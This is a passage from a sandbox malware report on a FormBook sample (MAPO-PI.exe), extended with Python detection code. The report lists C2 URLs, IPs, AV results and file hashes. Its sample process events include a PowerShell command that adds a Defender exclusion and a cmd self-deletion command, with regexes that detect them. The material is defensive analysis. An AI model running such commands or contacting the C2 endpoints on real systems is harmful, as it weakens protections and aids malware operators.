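# starts cmmon32.exe, which runs cmd.exe to delete the dropper.
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(100, 1, "explorer.exe", r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "mapo-pi.exe", r"C:\Users\user\Desktop\MAPO-PI.exe",
              r'"C:\Users\user\Desktop\MAPO-PI.exe"'),
    ProcEvent(201, 200, "powershell.exe",
              r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming"),
    ProcEvent(202, 200, "mapo-pi.exe", r"C:\Users\user\Desktop\MAPO-PI.exe",
              r'"C:\Users\user\Desktop\MAPO-PI.exe"'),
    ProcEvent(300, 100, "cmmon32.exe", r"C:\Windows\SysWOW64\cmmon32.exe",
              r"C:\Windows\SysWOW64\cmmon32.exe"),
    ProcEvent(301, 300, "cmd.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r'/c del "C:\Users\user\Desktop\MAPO-PI.exe"'),
    ProcEvent(302, 301, "conhost.exe", r"C:\Windows\System32\conhost.exe", "conhost.exe"),
]

WINDOWS_DIR = "c:\\windows\\"
DEFENDER_EXCLUSION = re.compile(r"add-mppreference\b.*-exclusion(?:path|process|extension)", re.I)
CMD_DEL_TARGET = re.compile(r'(?:^|[\s&])del\s+"?([a-z]:\\[^"\s]+)', re.I)


def by_pid(events: List[ProcEvent]) -> Dict[int, ProcEvent]:
    return {e.pid: e for e in events}


def ancestry(pid: int, events: List[ProcEvent]) -> List[str]:
    """Image names from the oldest known ancestor down to pid."""
    index = by_pid(events)
    chain: List[str] = []
    cur: Optional[ProcEvent] = index.get(pid)
    while cur is not None:
        chain.append(cur.image)
        cur = index.get(cur.ppid)
    return list(reversed(chain))


def detect(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """Return (rule, pid) pairs for the three behaviours the report attributes to this sample."""
    index = by_pid(events)
    findings: List[Tuple[str, int]] = []
    for ev in events:
        parent = index.get(ev.ppid)
        # Rule 1: Defender exclusion added through PowerShell ("Adds a directory
        # exclusion to Windows Defender"). Outside admin tooling this is always worth a look.
        if ev.image == "powershell.exe" and DEFENDER_EXCLUSION.search(ev.cmdline):
            findings.append(("defender_exclusion_via_powershell", ev.pid))
        # Rule 2: a process starts a second copy of itself with an identical command
        # line, the usual first step of hollowing a suspended child (heuristic only).
        if parent is not None and parent.image == ev.image and parent.cmdline == ev.cmdline:
            findings.append(("self_spawn_hollowing_candidate", ev.pid))
        # Rule 3: explorer.exe -> binary under C:\Windows -> cmd.exe deleting a file
        # outside C:\Windows ("Self deletion via cmd delete" driven by injected explorer.exe).
        if ev.image == "cmd.exe" and parent is not None:
            target = CMD_DEL_TARGET.search(ev.cmdline)
            grandparent = index.get(parent.ppid)
            if (target is not None
                    and grandparent is not None and grandparent.image == "explorer.exe"
                    and parent.path.lower().startswith(WINDOWS_DIR)
                    and not target.group(1).lower().startswith(WINDOWS_DIR)):
                findings.append(("explorer_lolbin_cmd_self_delete", ev.pid))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}, chain {' -> '.join(ancestry(pid, SAMPLE_EVENTS))}")
```

          Rule 3 keys on the shape of the chain rather than on the name cmmon32.exe, because FormBook picks its host process from a list of Windows binaries and the name varies between runs; the report's own signature text ("Self deletion via cmd delete", "System process connects to network") describes the shape, not the name.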


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          MAPO-PI.exe | 31% | Virustotal |
          MAPO-PI.exe | 39% | ReversingLabs | ByteCode-MSIL.Trojan.Pwsx

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          3.0.MAPO-PI.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          3.2.MAPO-PI.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          3.0.MAPO-PI.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          3.0.MAPO-PI.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          http://www.diofis.com/hakkimizda/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/wp-includes/wlwmanifest.xml | 0% | Avira URL Cloud | safe
          http://www.diofis.com/blog/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/2020/10/24/kahvaltilik-tarifler/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/hizmetlerimiz/hastaliklarda-beslenme-danismanligi/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/wp-content/themes/neve/style.min.css?ver=2.8.3 | 0% | Avira URL Cloud | safe
          http://www.diofis.com/hizmetlerimiz/bireysel-beslenme-danismanligi/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/2020/10/24/saglikli-ve-pratik-roka-salatasi/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/#logo | 0% | Avira URL Cloud | safe
          http://www.diofis.com/#organization | 0% | Avira URL Cloud | safe
          http://www.diofis.com/2020/11/19/aspir-yagi/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/2020/10/24/maydanoz-cayi/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/category/guncel-diyet-meseleleri/ | 0% | Avira URL Cloud | safe
          http://www.collada.org/2005/11/COLLADASchema9Done | 0% | URL Reputation | safe
          http://www.diofis.com/wp-content/uploads/2020/09/cropped-cropped-diofis-logo-2-3.png | 0% | Avira URL Cloud | safe
          http://www.diofis.com/2020/10/24/elma-cayi/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/2020/11/01/cikolatali-toplar/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/hizmetlerimiz/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/2020/11/01/cennet-tatlisi/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/wp-json/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/2020/10/24/portakalli-meyve-cayi/ | 0% | Avira URL Cloud | safe
          https://m0n.co/ga | 0% | Avira URL Cloud | safe
          www.diofis.com/rigx/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/2020/10/24/odem-cayi-2/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/category/sporcu-beslenmesi/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/wp-content/uploads/2020/09/cropped-diofis-logo-2.png | 0% | Avira URL Cloud | safe
          http://www.diofis.com/feed/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/hizmetlerimiz/kurumsal-beslenme-danismanligi/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/category/tarifler/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com?sccss=1&#038;ver=5.5.6 | 0% | Avira URL Cloud | safe
          http://www.diofis.com/2020/10/24/saglikli-ve-pratik-corba-tarifi/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/2020/11/01/ketojenik-beslenme/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/comments/feed/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/hizmetlerimiz/cocukluk-cagi-beslenme-danismanligi/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/2020/10/24/sebze-corbasi-tarifi/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/2020/10/24/yulafli-kahvalti/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/2020/10/24/meyve-cayi/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/bize-ulasin/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/partnerlerimiz/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/xmlrpc.php?rsd | 0% | Avira URL Cloud | safe
          http://www.diofis.com/2020/10/24/saglikli-ve-pratik-salata-tarifi/ | 0% | Avira URL Cloud | safe
          http://www.lifeinformpodcast.com/rigx/?8pr=9rQH8&1btd7D=sXodP5plw2zuBk5jc17bfKeMRD93SLnVb+AwVzSLCtQvXrT73UIO1hDRl0kooUZyQ/sm | 0% | Avira URL Cloud | safe
          http://www.diofis.com/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/?s= | 0% | Avira URL Cloud | safe
          http://www.transforming-leadership.com/rigx/?1btd7D=9134s0FnLt/OWarUedgABr9C/c4q5kSlc0KYi18j8Gti+B07oVRLIxAr1gTintGupYIr&8pr=9rQH8 | 0% | Avira URL Cloud | safe
          http://www.diofis.com/2020/10/24/odem-cayi/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/rigx/?8pr=9rQH8&1btd7D=x7Tu96cHMgTmU7mY47TISrjDcbGhV6G9B99bVm0ZcSL4vblov6CXxXD4o82KDOntdPMV | 0% | Avira URL Cloud | safe
          http://www.diofis.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.6 | 0% | Avira URL Cloud | safe
          http://www.diofis.com/hizmetlerimiz/kilo-koruma-beslenme-danismanligi/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/2020/11/27/sporcu-beslenmesinde-yeterli-ve-dengeli-beslenmenin-onemi/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/hizmetlerimiz/online-beslenme-danismanligi/ | 0% | Avira URL Cloud | safe
          http://www.diofis.com/#website | 0% | Avira URL Cloud | safe
          http://www.diofis.com/2020/10/24/rahatlatici-cay/ | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    www.transforming-leadership.com | 159.65.10.143 | true | true | | unknown
                    lifeinformpodcast.com | 34.102.136.180 | true | false | | unknown
                    diofis.com | 109.232.217.55 | true | true | | unknown
                    www.diofis.com | unknown | unknown | true | | unknown
                    www.lifeinformpodcast.com | unknown | unknown | true | | unknown

                    Contacted URLs

                    Name | Malicious | Antivirus Detection | Reputation
                    www.diofis.com/rigx/ | true | Avira URL Cloud: safe | low
                    http://www.lifeinformpodcast.com/rigx/?8pr=9rQH8&1btd7D=sXodP5plw2zuBk5jc17bfKeMRD93SLnVb+AwVzSLCtQvXrT73UIO1hDRl0kooUZyQ/sm | false | Avira URL Cloud: safe | unknown
                    http://www.transforming-leadership.com/rigx/?1btd7D=9134s0FnLt/OWarUedgABr9C/c4q5kSlc0KYi18j8Gti+B07oVRLIxAr1gTintGupYIr&8pr=9rQH8 | true | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/rigx/?8pr=9rQH8&1btd7D=x7Tu96cHMgTmU7mY47TISrjDcbGhV6G9B99bVm0ZcSL4vblov6CXxXD4o82KDOntdPMV | true | Avira URL Cloud: safe | unknown
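                    The four contacted URLs share one path, /rigx/, and one parameter with a constant value, 8pr=9rQH8, on three otherwise unrelated hosts, while the second parameter carries a different blob each time. That is how FormBook operates: the configuration holds a list of domains and a single URI path, and the bot walks the list, so most of the hosts are decoys or unrelated sites (the memory strings further down show diofis.com answering with an ordinary WordPress front page). Host reputation is therefore useless here (Avira rates every one of them safe); the durable indicator is the URI pattern. The Python below is an added example, not part of the Joe Sandbox report: it clusters the URLs copied from the table above by path, separates constant parameters from varying ones, and turns the result into a matcher. The URL passed to matches in the usage note uses a placeholder host and value that are assumptions.

```python
"""Cluster the C2 URLs from this report by URI pattern and turn the pattern into a matcher.

Added example, not part of the Joe Sandbox report. REPORT_URLS is copied from the
"Contacted URLs" table; everything else is this example's own code.
"""
from collections import Counter, defaultdict
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

REPORT_URLS: List[str] = [
    "www.diofis.com/rigx/",
    "http://www.lifeinformpodcast.com/rigx/?8pr=9rQH8&1btd7D=sXodP5plw2zuBk5jc17bfKeMRD93SLnVb+AwVzSLCtQvXrT73UIO1hDRl0kooUZyQ/sm",
    "http://www.transforming-leadership.com/rigx/?1btd7D=9134s0FnLt/OWarUedgABr9C/c4q5kSlc0KYi18j8Gti+B07oVRLIxAr1gTintGupYIr&8pr=9rQH8",
    "http://www.diofis.com/rigx/?8pr=9rQH8&1btd7D=x7Tu96cHMgTmU7mY47TISrjDcbGhV6G9B99bVm0ZcSL4vblov6CXxXD4o82KDOntdPMV",
]


def split_query(query: str) -> Dict[str, str]:
    """Split key=value pairs without decoding: parse_qs would turn the '+' in the blob into a space."""
    params: Dict[str, str] = {}
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            params[key] = value
    return params


def parse_c2(url: str) -> Tuple[str, str, Dict[str, str]]:
    """Return (host, path, params); a scheme is prepended when the report omits it."""
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    return (parts.hostname or "").lower(), parts.path, split_query(parts.query)


def cluster(urls: List[str]) -> Dict[str, dict]:
    """Group URLs by path. Per group: hosts, parameters whose value is the same in
    every URL that carries them (seen at least twice), and parameters that vary."""
    members = defaultdict(list)
    for url in urls:
        host, path, params = parse_c2(url)
        members[path].append((host, params))
    result: Dict[str, dict] = {}
    for path, group in members.items():
        values = defaultdict(set)
        occurrences: Counter = Counter()
        for _, params in group:
            for key, value in params.items():
                values[key].add(value)
                occurrences[key] += 1
        result[path] = {
            "hosts": sorted({host for host, _ in group}),
            "static": {k: next(iter(v)) for k, v in values.items()
                       if len(v) == 1 and occurrences[k] > 1},
            "varying": sorted(k for k, v in values.items() if len(v) > 1),
        }
    return result


def matches(url: str, path: str, pattern: dict) -> bool:
    """True when url uses the clustered path and carries every static parameter with its learned value."""
    _, url_path, params = parse_c2(url)
    if url_path != path:
        return False
    return all(params.get(k) == v for k, v in pattern["static"].items())


if __name__ == "__main__":
    patterns = cluster(REPORT_URLS)
    for path, pattern in patterns.items():
        print(path, pattern)
    # Placeholder host and blob value (assumptions) to show the matcher ignoring the host.
    print(matches("http://example.invalid/rigx/?8pr=9rQH8&1btd7D=AAAA", "/rigx/", patterns["/rigx/"]))
```

                    For this report the cluster comes out as path /rigx/, static parameter 8pr=9rQH8, varying parameter 1btd7D, across www.diofis.com, www.lifeinformpodcast.com and www.transforming-leadership.com; the same path and static parameter on a host that is not in the list is the check worth running over proxy logs.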

                    URLs from Memory and Binaries

                    Source A = cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp
                    Source B = MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp

                    Name | Source | Malicious | Antivirus Detection | Reputation
                    https://www.monsterinsights.com/ | A | false | | high
                    http://www.diofis.com/hakkimizda/ | A | false | Avira URL Cloud: safe | unknown
                    https://yoast.com/wordpress/plugins/seo/ | A | false | | high
                    http://www.diofis.com/wp-includes/wlwmanifest.xml | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/blog/ | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/2020/10/24/kahvaltilik-tarifler/ | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/hizmetlerimiz/hastaliklarda-beslenme-danismanligi/ | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/wp-content/themes/neve/style.min.css?ver=2.8.3 | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/hizmetlerimiz/bireysel-beslenme-danismanligi/ | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/2020/10/24/saglikli-ve-pratik-roka-salatasi/ | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/#logo | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/#organization | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/2020/11/19/aspir-yagi/ | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/2020/10/24/maydanoz-cayi/ | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/category/guncel-diyet-meseleleri/ | A | false | Avira URL Cloud: safe | unknown
                    http://www.collada.org/2005/11/COLLADASchema9Done | B | false | URL Reputation: safe | unknown
                    http://www.diofis.com/wp-content/uploads/2020/09/cropped-cropped-diofis-logo-2-3.png | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/2020/10/24/elma-cayi/ | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/2020/11/01/cikolatali-toplar/ | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/hizmetlerimiz/ | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/2020/11/01/cennet-tatlisi/ | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/wp-json/ | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/2020/10/24/portakalli-meyve-cayi/ | A | false | Avira URL Cloud: safe | unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | B | false | | high
                    https://m0n.co/ga | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/2020/10/24/odem-cayi-2/ | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/category/sporcu-beslenmesi/ | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/wp-content/uploads/2020/09/cropped-diofis-logo-2.png | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/feed/ | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/hizmetlerimiz/kurumsal-beslenme-danismanligi/ | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/category/tarifler/ | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com?sccss=1&#038;ver=5.5.6 | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/2020/10/24/saglikli-ve-pratik-corba-tarifi/ | A | false | Avira URL Cloud: safe | unknown
                    https://api.w.org/ | A | false | | high
                    http://www.diofis.com/2020/11/01/ketojenik-beslenme/ | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/comments/feed/ | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/hizmetlerimiz/cocukluk-cagi-beslenme-danismanligi/ | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/2020/10/24/sebze-corbasi-tarifi/ | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/2020/10/24/yulafli-kahvalti/ | A | false | Avira URL Cloud: safe | unknown
                    https://schema.org | A | false | | high
                    http://www.diofis.com/2020/10/24/meyve-cayi/ | A | false | Avira URL Cloud: safe | unknown
                    http://gmpg.org/xfn/11 | A | false | | high
                    http://www.diofis.com/bize-ulasin/ | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/partnerlerimiz/ | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/xmlrpc.php?rsd | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/2020/10/24/saglikli-ve-pratik-salata-tarifi/ | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/ | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/?s= | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/2020/10/24/odem-cayi/ | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.6 | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/hizmetlerimiz/kilo-koruma-beslenme-danismanligi/ | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/2020/11/27/sporcu-beslenmesinde-yeterli-ve-dengeli-beslenmenin-onemi/ | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/hizmetlerimiz/online-beslenme-danismanligi/ | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/#website | A | false | Avira URL Cloud: safe | unknown
                    http://www.diofis.com/2020/10/24/rahatlatici-cay/ | A | false | Avira URL Cloud: safe | unknown

                                Contacted IPs


                                Public

                                IP | Domain | Country | ASN | ASN Name | Malicious
                                34.102.136.180 | lifeinformpodcast.com | United States | 15169 | GOOGLEUS | false
                                159.65.10.143 | www.transforming-leadership.com | United States | 14061 | DIGITALOCEAN-ASNUS | true
                                109.232.217.55 | diofis.com | Turkey | 42807 | AEROTEK-ASTR | true

                                General Information

                                Joe Sandbox Version:33.0.0 White Diamond
                                Analysis ID:510736
                                Start date:28.10.2021
                                Start time:07:39:13
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 9m 33s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:MAPO-PI.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of new started processes analysed:29
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:1
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@10/5@3/3
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 9% (good quality ratio 8%)
                                • Quality average: 72.1%
                                • Quality standard deviation: 32%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                Warnings:
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                • TCP Packets have been reduced to 100
                                • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 20.82.210.154, 23.211.6.115, 23.211.4.86, 20.50.102.62, 40.112.88.60, 80.67.82.211, 80.67.82.235, 20.82.209.183
                                • Excluded domains from analysis (whitelisted): www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                • Not all processes were analyzed; the report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                Time | Type | Description
                                07:40:04 | API Interceptor | 1x Sleep call for process: MAPO-PI.exe modified
                                07:40:08 | API Interceptor | 37x Sleep call for process: powershell.exe modified

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                No context

                                ASN

                                Match | Associated Sample Name / URL | Detection | Context (IP in this ASN)
                                DIGITALOCEAN-ASNUS | digital.alarmclock.alarmy.apk | malicious | 159.203.83.162
                                DIGITALOCEAN-ASNUS | digital.alarmclock.alarmy.apk | malicious | 159.203.83.162
                                DIGITALOCEAN-ASNUS | e6dff8475541ebddc1f0db47a311eb2c25581b7d5e62a.exe | malicious | 206.81.21.194
                                DIGITALOCEAN-ASNUS | 10272021-AM65Application.HTM | malicious | 5.101.110.225
                                DIGITALOCEAN-ASNUS | v2.exe | malicious | 139.59.30.14
                                DIGITALOCEAN-ASNUS | gqqrsjn4g8 | malicious | 161.35.54.166
                                DIGITALOCEAN-ASNUS | mdOr6C8jJp | malicious | 161.35.54.166
                                DIGITALOCEAN-ASNUS | Order.exe | malicious | 138.197.164.163
                                DIGITALOCEAN-ASNUS | scMacvapQQ | malicious | 161.35.54.166
                                DIGITALOCEAN-ASNUS | 3Y8WDTH5lr | malicious | 161.35.54.166
                                DIGITALOCEAN-ASNUS | 9ecqofrtuo | malicious | 161.35.54.166
                                DIGITALOCEAN-ASNUS | vx69bSxRQa | malicious | 161.35.54.166
                                DIGITALOCEAN-ASNUS | 8Xm9hcPRW9 | malicious | 161.35.54.166
                                DIGITALOCEAN-ASNUS | hVq8pSanzK | malicious | 161.35.54.166
                                DIGITALOCEAN-ASNUS | t0rtYC582w | malicious | 161.35.54.166
                                DIGITALOCEAN-ASNUS | JpvnaZB6aU | malicious | 161.35.54.166
                                DIGITALOCEAN-ASNUS | GBlokuLqdg | malicious | 161.35.54.166
                                DIGITALOCEAN-ASNUS | DpK5nUwiwE.exe | malicious | 159.89.117.132
                                DIGITALOCEAN-ASNUS | GU5kmLwV7r.exe | malicious | 157.245.5.40
                                DIGITALOCEAN-ASNUS | peSZa2MV75.exe | malicious | 157.245.5.40
                                AEROTEK-ASTR | 2FNlQLySZS.exe | malicious | 94.199.200.61
                                AEROTEK-ASTR | Tips Ref.exe | malicious | 94.199.200.62
                                AEROTEK-ASTR | RFQ NO. T01777ENQ-0090F8.exe | malicious | 109.232.217.77
                                AEROTEK-ASTR | PO12031.exe | malicious | 94.199.200.62
                                AEROTEK-ASTR | Halkbank_Ekstre_20210726_084931-069855PDF.exe | malicious | 94.199.200.62
                                AEROTEK-ASTR | Ziraat Bankas#U0131 Swift Mesaj#U0131.exe | malicious | 37.230.104.41
                                AEROTEK-ASTR | Ehsu0xgexofjfX9.exe | malicious | 178.157.8.3
                                AEROTEK-ASTR | KNm3lXniFj.exe | malicious | 109.232.216.164
                                AEROTEK-ASTR | Halkbank_Ekstre_20210309_080203_744632.PDF.exe | malicious | 94.199.200.87
                                AEROTEK-ASTR | doc2019291888001990.pdf.exe | malicious | 94.199.200.87
                                AEROTEK-ASTR | kuKyYYYuS0.exe | malicious | 31.207.83.53
                                AEROTEK-ASTR | 4zfdibTbxl.exe | malicious | 31.207.83.53
                                AEROTEK-ASTR | W0HuUhFe5Kma3EO.exe | malicious | 178.157.8.3
                                AEROTEK-ASTR | INVOICE 5204.exe | malicious | 31.207.83.53
                                AEROTEK-ASTR | 80893_payslip.exe | malicious | 94.199.200.62
                                AEROTEK-ASTR | 2UZ8zLT94pJEufW.exe | malicious | 178.157.8.3
                                AEROTEK-ASTR | hesaphareketi-01.pdf.exe | malicious | 94.199.200.87
                                AEROTEK-ASTR | hesaphareketi-01.pdf.exe | malicious | 94.199.200.87
                                AEROTEK-ASTR | Transfer receipt Copy 1038690332210516.exe | malicious | 94.199.200.62
                                AEROTEK-ASTR | 60rUtFJPFb.exe | malicious |
                                • 94.199.200.203

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MAPO-PI.exe.log
                                Process: C:\Users\user\Desktop\MAPO-PI.exe
                                File Type: ASCII text, with CRLF line terminators
                                Category: dropped
                                Size (bytes): 1216
                                Entropy (8bit): 5.355304211458859
                                Encrypted: false
                                SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                MD5: FED34146BF2F2FA59DCF8702FCC8232E
                                SHA1: B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                SHA-256: 123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                SHA-512: 1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                Malicious: true
                                Reputation: high, very likely benign file
                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type: data
                                Category: dropped
                                Size (bytes): 22216
                                Entropy (8bit): 5.605411736270381
                                Encrypted: false
                                SSDEEP: 384:itCD3q0uQVhlitckG2mRkSBKn8jultIar7Y9g9SJ3xqT1MaXZlbAV7qWDuZBDI+g:jVr4ckN4K8Clt1v9cQCufwUVW
                                MD5: 95B172E74C7587008D47DD07599466DF
                                SHA1: F109393BB49245183CF3EF821B4CF467A99ABB0B
                                SHA-256: 9CD70D7F52085B373DD40A8B3B03E568431FBA0DAA51A589D17FCC773438A3FF
